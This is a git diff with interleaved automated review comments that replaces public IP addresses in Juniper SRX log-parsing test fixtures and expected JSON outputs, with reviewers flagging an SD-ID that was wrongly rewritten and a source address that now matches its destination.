@@ -725,48 +652,30 @@ { "server": { "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -803,17 +712,18 @@ "EICAR-Test-File" ], "ip": [ - "216.160.83.61" + "67.43.156.13", + "10.1.1.103" ] }, "client": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371221649Z", - "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address=\"216.160.83.61\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:14:14.639541900Z", + "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ @@ -831,29 +741,26 @@ { "server": { "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "source": { "port": 58974, @@ -898,7 +805,7 @@ ], "ip": [ "10.1.1.100", - "216.160.83.61" + "67.43.156.14" ] }, "client": { 
@@ -907,8 +814,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:35.371223503Z", - "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"216.160.83.61\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", + "ingested": "2021-12-10T10:14:14.639547300Z", + "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"67.43.156.14\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", "risk_score": 0.0, "kind": "event", "category": [ 
@@ -924,29 +831,26 @@ { "server": { "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "source": { "port": 59075, @@ -991,7 +895,7 @@ ], "ip": [ "10.1.1.100", - "216.160.83.61" + "67.43.156.13" ] }, "client": { 
@@ -1000,8 +904,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371225036Z", - "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"216.160.83.61\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", + "ingested": "2021-12-10T10:14:14.639552100Z", + "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"67.43.156.13\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", "risk_score": 3.0, "kind": "alert", "action": "web_filter", 
@@ -1020,39 +924,30 @@ { "server": { "port": 58954, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "log": { "level": "warning" }, "destination": { + "port": 58954, + "ip": "10.1.1.100" + }, + "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, - "port": 58954, - "ip": "216.160.83.61" - }, - "source": { "port": 80, - "as": { - "number": 35994, - "organization": { - "name": "Akamai Technologies, Inc." - } - }, - "ip": "23.209.86.45" + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -1088,18 +983,18 @@ }, "related": { "ip": [ - "23.209.86.45", - "216.160.83.61" + "67.43.156.13", + "10.1.1.100" ] }, "client": { "port": 80, - "ip": "23.209.86.45" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371226809Z", - "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"23.209.86.45\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639558300Z", + "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", "kind": "event", "category": [ "network" diff --git a/packages/juniper/manifest.yml b/packages/juniper/manifest.yml index 06c9b2577bf..aeb4b4f0c3d 100644 --- a/packages/juniper/manifest.yml +++ b/packages/juniper/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper title: Juniper Logs -version: 1.0.5 +version: 1.0.6 description: Deprecated. Use a specific Juniper package instead. categories: ["network", "security"] release: ga 
diff --git a/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log b/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log index 38c11bb4104..253d25cb005 100644 --- a/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log +++ b/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log 
@@ -1,2 +1,2 @@
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="216.160.83.57" source-port="58071" destination-address="89.160.20.112" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="594" destination-address="89.160.20.112" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="67.43.156.12" nat-source-port="594" nat-destination-address="67.43.156.14" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A"
protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] diff --git a/packages/juniper_srx/changelog.yml b/packages/juniper_srx/changelog.yml index 93f1dfd6a78..1ff5f3f11e9 100644 --- a/packages/juniper_srx/changelog.yml +++ b/packages/juniper_srx/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.0" changes: - description: Initial release of new package split from oroginal Juniper package diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log index 168c3dd9843..fb82adabaf4 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log 
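Review bot: The structured-data ID on both `+` lines, `[junos@67.43.156.15 ...`, is not an IP address and should not have been rewritten: the old `junos@2636.1.1.1.2.86` / `junos@2636.1.1.1.2.134` is an RFC 5424 SD-ID whose suffix is an IANA enterprise number (2636 is Juniper's), and it was presumably swept up by a dotted-quad replacement pass. Nothing fails, since the regenerated expected output simply carries the new string through `event.original`, but the sample no longer resembles real SRX output and the fixtures now pin a value no device emits. Restore `[junos@2636.1.1.1.2.86` and `[junos@2636.1.1.1.2.134` on the two `+` lines (the same substitution appears in the other sample and expected files of this change), and if the IP check flags them, exempt the SD-ID token rather than rewriting the data.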
@@ -1,4 +1,4 @@
-<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="175.16.199.1" source-port="57116" destination-address="216.160.83.57" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"]
-<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="1.128.3.4" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"]
-<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="1.128.3.4" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"]
-<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="175.16.199.1" source-port="60148" destination-address="216.160.83.57" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"]
+<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="67.43.156.15" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"]
+<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.168.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"]
+<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.168.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"]
+<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="67.43.156.15" source-port="60148" destination-address="67.43.156.15" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"]
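Review bot: The `+<165>1 ... AAMW_ACTION_LOG` line now uses `67.43.156.15` for the SD-ID, `source-address` and `destination-address` alike, so the event describes a public address talking to itself across the `Inside`→`Outside` zones, and the regenerated expected output for this event collapses `related.ip` to a single entry, losing the check that distinct source and destination addresses both land there. Keep the addresses distinct, e.g. `source-address="10.10.10.2"` for the Inside zone with `destination-address="67.43.156.15"`, or pick another address from the permitted range if source geo coverage is wanted. Separately, `client-ip="192.168.2.0"` on the two middle `+` lines is the .0 address of a /24, an odd choice for a client host; `192.168.2.1` reads more naturally. As in the other sample files, `junos@67.43.156.15` on the last line replaced the enterprise-number SD-ID `junos@2636.1.1.1.2.129`, which is not an IP and should be restored.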
diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json index ee215f5e8bd..eb3bdb662ce 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json @@ -3,48 +3,33 @@ { "server": { "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 57116, "user": { "name": "user1" }, - "ip": "175.16.199.1" + "ip": "10.10.10.1" }, "juniper": { "srx": { 
@@ -91,18 +76,18 @@ "www.mytest.com" ], "ip": [ - "175.16.199.1", - "216.160.83.57" + "10.10.10.1", + "67.43.156.15" ] }, "client": { "port": 57116, - "ip": "175.16.199.1" + "ip": "10.10.10.1" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:15.401067633Z", - "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"175.16.199.1\" source-port=\"57116\" destination-address=\"216.160.83.57\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", + "ingested": "2021-12-10T10:15:56.414273600Z", + "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"67.43.156.15\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -136,24 +121,18 @@ "host.example.com" ], "ip": [ - "1.128.3.4" + "192.168.2.0" ] }, "log": { "level": "informational" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "user": { "name": "admin" }, "domain": "host.example.com", - "ip": "1.128.3.4" + "ip": "192.168.2.0" }, "juniper": { "srx": { 
@@ -168,8 +147,8 @@ }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:15.401090205Z", - "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"1.128.3.4\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", + "ingested": "2021-12-10T10:15:56.414284200Z", + "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.168.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -203,21 +182,15 @@ "host.example.com" ], "ip": [ - "1.128.3.4" + "192.168.2.0" ] }, "log": { "level": "error" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "domain": "host.example.com", - "ip": "1.128.3.4" + "ip": "192.168.2.0" }, "juniper": { "srx": { 
@@ -235,8 +208,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:15.401096838Z", - "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"1.128.3.4\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", + "ingested": "2021-12-10T10:15:56.414290700Z", + "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.168.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", "kind": "alert", "category": [ "network", 
@@ -255,45 +228,42 @@ { "server": { "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "notification" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 60148, - "ip": "175.16.199.1", + "ip": "67.43.156.15", "domain": "dummy_host" }, "juniper": { 
@@ -340,18 +310,17 @@
 "dummy_host"
 ],
 "ip": [
- "175.16.199.1",
- "216.160.83.57"
+ "67.43.156.15"
 ]
 },
 "client": {
 "port": 60148,
- "ip": "175.16.199.1"
+ "ip": "67.43.156.15"
 },
 "event": {
 "severity": 165,
- "ingested": "2021-11-25T09:37:15.401101486Z",
- "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"175.16.199.1\" source-port=\"60148\" destination-address=\"216.160.83.57\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]",
+ "ingested": "2021-12-10T10:15:56.414297Z",
+ "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"67.43.156.15\" source-port=\"60148\" destination-address=\"67.43.156.15\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]",
 "kind": "event",
 "category": [
 "network"
diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log
index f40b307944c..362c16b63f3 100644
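Review bot: The structured-data ID inside `event.original` changed from `[junos@2636.1.1.1.2.129` to `[junos@67.43.156.15`, but that token is the RFC 5424 SD-ID carrying Juniper's IANA enterprise number, not an IP address, so the address substitution over-matched here; the same replacement runs through every record of the test-flow.log hunk that starts below and continues past the end of this view. Keeping the `junos@2636.…` form in the input sample keeps the fixture faithful to what an SRX actually emits and continues to exercise whatever handling the pipeline has for that identifier, which a synthetic `junos@<ip>` value does not. The `ingested` change on this hunk's `+` line is regeneration churn and is covered by the note on the `@@ -235,8 +208,8 @@` hunk. The enclosing event object begins and ends outside this hunk.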
--- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log
+++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log
@@ -1,25 +1,25 @@ -<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="594" destination-address="175.16.199.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="594" nat-destination-address="216.160.83.57" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="37233" destination-address="175.16.199.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address="216.160.83.57" source-port="56639" destination-address="175.16.199.1" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" 
